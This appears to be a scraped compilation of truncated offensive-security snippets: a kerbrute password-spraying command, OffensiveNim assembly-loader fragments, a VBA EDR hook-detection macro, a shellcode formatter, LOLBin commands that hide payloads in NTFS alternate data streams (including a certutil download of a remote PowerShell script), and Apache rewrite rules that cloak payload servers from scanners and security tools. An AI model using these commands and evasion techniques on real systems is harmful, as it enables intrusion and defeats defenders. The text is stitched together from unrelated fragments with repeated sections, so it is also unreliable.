With kerbrute.py (every user/password pair is a Kerberos pre-authentication attempt; failed attempts count toward the domain lockout threshold, so check the lockout policy before running a password list):
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
import nimcrypto | |
import winim/clr except `[]` # `[]` is excluded to avoid ambiguous-overload errors with Nim's own `[]` indexing; see https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/
#[ | |
All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t | |
nimble install winim nimcrypto zippy | |
nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim | |
slurp (an alias of staticRead) reads the file at compile time and embeds its contents as a constant in the binary (it ends up in the .rdata section), so the assembly ships inside the executable instead of being read from disk at run time.
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA macro that detects in-process (userland) API hooks placed by EDR products; the declarations above resolve the target export (GetModuleHandleA/GetProcAddress) and copy its leading bytes (RtlMoveMemory), presumably for checkHook to inspect the function prologue.
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
With kerbrute.py (every user/password pair is a Kerberos pre-authentication attempt; failed attempts count toward the domain lockout threshold, so check the lockout policy before running a password list):
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
#!/usr/bin/env python | |
import sys | |
if __name__ == "__main__": | |
if len(sys.argv) < 2: | |
print "usage: %s file.bin\n" % (sys.argv[0],) | |
sys.exit(0) | |
shellcode = "\"" | |
ctr = 1 | |
maxlen = 15 |
REM Writing a payload into an NTFS alternate data stream (ADS) using built-in /
REM signed Windows binaries ("LOLBins"). The stream is addressed as
REM "<file>:<stream>"; the host file keeps its normal size and content in
REM Explorer and a plain "dir".
REM Defensive note: ADS are visible to "dir /R", Sysinternals streams.exe and
REM PowerShell "Get-Item <file> -Stream *", and they are lost when the file is
REM copied to a non-NTFS volume.
###Add content to ADS### | |
REM type + redirection: copies the raw bytes of evil.exe into a stream on the TeamViewer log file
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
REM extrac32: extracts a CAB archive straight into a stream
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
REM findstr /V /L: inverse literal match on a string that never occurs, so every line of the source file is written to the stream
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
REM certutil -urlcache: downloads a remote file into a stream; "c:\temp:ttt" is a stream on the directory itself
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
REM makecab: writes a CAB archive into a stream
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
REM print /D: the stream name is passed as the "printer device" target
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
REM reg export / regedit /E: export a registry key into a stream
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
REM expand: copies a file from a WebDAV share into a stream
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
#!/usr/bin/python | |
# -*- coding: utf8 -*- | |
# | |
# Author: Arno0x0x, Twitter: @Arno0x0x | |
# NOTE: "Crypto.Cipher" below is the PyCrypto namespace; PyCrypto is unmaintained,
# so install pycryptodome, which exposes the same Crypto.Cipher.AES API.
import argparse | |
from Crypto.Cipher import AES | |
import pyscrypt | |
from base64 import b64encode |
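#LogLevel alert rewrite:trace3
# Time-based access: fire the rule (target "replaceme" - substitute the
# redirect URL) when the request arrives outside 06:00-18:00 server local time.
# Consecutive RewriteCond lines are ANDed unless flagged [OR]; the two
# comparisons below are mutually exclusive, so without [OR] the rule could
# never match. %{TIME_HOUR}%{TIME_MIN} is a zero-padded "HHMM" string, which
# is why the lexicographic < and > operators of RewriteCond work here.
RewriteCond %{TIME_HOUR}%{TIME_MIN} <0600 [OR]
RewriteCond %{TIME_HOUR}%{TIME_MIN} >1800
RewriteRule ^.*$ replaceme [L]
# Day-of-week based access: %{TIME_WDAY} is 0 (Sunday) .. 6 (Saturday).
# The same [OR] is required so that either weekend day matches.
RewriteCond %{TIME_WDAY} =0 [OR]
RewriteCond %{TIME_WDAY} =6
RewriteRule ^.*$ replaceme [L]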
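# Redirect non-browser, scanner, crawler, mobile and empty user agents away
# from the payload (target "replaceme" - substitute the redirect URL).
# Every condition except the last carries [OR]: RewriteCond lines are ANDed
# by default, and a UA cannot match a bot pattern AND a mobile pattern AND be
# empty at the same time, so without [OR] on the third and fourth lines this
# rule could never fire.
# The bare "+" alternative in the second pattern was an unescaped quantifier
# ("zgrab|+|X11" does not compile in PCRE: "nothing to repeat"), which makes
# httpd refuse the config with "cannot compile regular expression". It is
# escaped as a literal "\+" so it still catches crawler UAs of the form
# "(compatible; bot/1.0; +http://...)".
# Caveats left as written: "Safari" also matches Chrome (its UA ends in
# "Safari/537.36"), "-" matches any UA containing a hyphen, ".net" matches any
# character followed by "net", and short tokens such as "vas" or "rapid" hit
# legitimate strings that happen to contain them. Tighten these before
# deploying in front of real users.
RewriteCond %{HTTP_USER_AGENT} "bits|bitsadmin|WindowsPowerShell|certutil|adobe" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "zgrab|\+|X11|OpenBSD|Googlebot|python|java|linux|wget|curl|.net|git|virustotalcloud|Gh0st" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "Firefox/3.6.8|Safari|OS x|-|HTTP Banner Detection|Lynx|Slackbot|nmap|burp|cloudfront|bingbot|clshttp|archiver|sparta|loader|email|nikto|nessus|rapid|Qualys|vas|miner|sparta|HTTrack|crawl|shell|yahoo|google|bot|b\-o\-t|spider|baidu" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|iPhone|googlebot-mobile|Kindle|Nintendo|PlayStation|Windows Phone|XBOX_ONE_ED|AppleTV|Roku|CrOS|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ replaceme [L]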
#User agent string for native compiled software Libs and Linux tools | |
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR] | |
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] |
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
Define REDIR_TARGET |DESTINATIONURL| | |
RewriteEngine On | |
RewriteOptions Inherit | |